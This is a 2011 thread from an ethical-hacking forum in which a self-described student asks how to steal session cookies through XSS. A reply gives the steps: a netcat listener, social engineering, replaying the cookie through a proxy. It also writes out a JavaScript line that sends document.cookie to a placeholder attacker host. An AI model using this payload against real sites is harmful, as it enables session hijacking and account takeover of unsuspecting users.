HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 33 guests online
 
Advertisement

You are here: Home arrow Ethical Hacking Discussions and Related Certificationsarrow Web Applicationsarrow XSS snatching cookie without domain
EH-Net
May 25, 2013, 01:35:22 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: XSS snatching cookie without domain  (Read 4133 times)
0 Members and 1 Guest are viewing this topic.
bigapple
Newbie
*
Offline Offline

Posts: 8


View Profile
« on: August 18, 2011, 01:39:29 PM »
Okay I'm new to this site so I'm hoping me question doesn't come off as malicious. This is for school, so I'm not trying to do anything evil. Anyways, I was wondering if its possible to snatch a cookie using XSS, and deliver it to an attacker without sending it to an attacker controlled domain. Like if an attacker didn't own a domain, or if the domain was blocked, is there any other method or trick that can be used to recieve the cookie? I can code in Javascript relatively well, so you can talk about Javascript functions, methods etc. And thats encouraged because I'm interested in the coding perspective so please give me your ideas. Thanks.  Grin
Logged
cd1zz
Hero Member
*****
Offline Offline

Posts: 561


View Profile WWW
« Reply #1 on: August 18, 2011, 02:45:37 PM »
3 assumptions: 1) the site uses session cookies and 2) there is an xss vulnerability in the application and 3) you can SE someone to open your link or get it to them somehow.

With that said, yes. You can basically take the cookie from the site using javascript and send it to a listener somewhere else. A simple remote netcat listener would do to capture your stolen cookie. With the data posted to your screen you'd just locate the cookie and copy it. Then, use a proxy to intercept your own web communications to inject your stolen cookie and what ever else you need. Does that answer your question?
Logged
OSCE | OSCP | GXPN | OSWP | CISSP
http://www.pwnag3.com
http://www.networkadminsecrets.com
bigapple
Newbie
*
Offline Offline

Posts: 8


View Profile
« Reply #2 on: August 18, 2011, 04:31:25 PM »
I thought Javascript code was limited to client-side browser stuff. Can Javascript even make a TCP connection? If it can, then yes that would answer my question very nicely. But I was thinking more along the lines of something like emailing the contents of the cookie, or some other web-related method of delivering it but that will work well. Thanks.
Logged
cd1zz
Hero Member
*****
Offline Offline

Posts: 561


View Profile WWW
« Reply #3 on: August 18, 2011, 04:45:10 PM »
You could use something like document.location.replace("http://yourbox/"+document.cookie+"pagelocation:"+document.location)

which would connect to "yourbox" where your netcat listener is and send you the cookie with the url query string.....

MaXe has a nice example here, not the same thing but it might get your wheels turning:  http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/
Logged
OSCE | OSCP | GXPN | OSWP | CISSP
http://www.pwnag3.com
http://www.networkadminsecrets.com
bigapple
Newbie
*
Offline Offline

Posts: 8


View Profile
« Reply #4 on: August 19, 2011, 06:33:31 AM »
Okay, thanks. That answers my question nicely  Grin
Logged
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.081 seconds with 23 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Free Business and Tech Magazines and eBooks

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.